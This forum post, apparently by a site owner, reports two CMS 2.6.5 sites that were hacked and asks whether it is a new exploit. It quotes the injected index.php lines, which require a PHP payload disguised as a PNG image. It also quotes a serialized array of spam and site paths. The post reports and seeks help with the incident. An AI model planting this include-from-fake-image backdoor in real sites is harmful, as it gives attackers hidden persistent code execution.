Have had 2 new 2.6.5 sites hacked.
New folder in root /sitemaps with a tonne of fake xml sitemaps, plus code injected into index.php:
//installbg
$rifilename='/var/www/vhosts/<DOMAIN>/httpdocs/content/img/footer-bgs.png';
require("$rifilename");
//installend
This "image" had a load code in it (can post if wanted), and came along with 2 other similarly named images, one of which appeared to be a template, and the other contained:
a:20:{s:1:"/";s:6:"301480";s:12:"/favicon.ico";s:4:"5837";s:6:"/faqs/";s:6:"130846";s:17:"/solutions/floors";s:6:"251218";s:16:"/tel:08006891054";s:5:"13134";s:6:"/about";s:6:"378664";s:8:"/contact";s:6:"536125";s:34:"/mailto:<MY DOMAINS EMAI ADDRESS>";s:6:"162439";s:18:"/dzptyjaluptn.html";s:6:"268369";s:10:"/quotation";s:6:"207385";s:16:"/types-of-noise/";s:6:"394376";s:19:"/solutions/ceilings";s:6:"274574";s:16:"/solutions/walls";s:6:"117594";s:16:"/mibiovgznb.html";s:6:"347468";s:18:"/solutions/studios";s:6:"260624";s:10:"/solutions";s:6:"222152";s:18:"/solutions/bespoke";s:6:"287381";s:11:"/solutions/";s:6:"350582";s:14:"/ipdhthvu.html";s:6:"623653";s:23:"/?cachebuster=841958990";s:6:"131312";}
Cleaned and upgraded to 2.7.0, but is this an new exploit with 2.6.5?
Thanks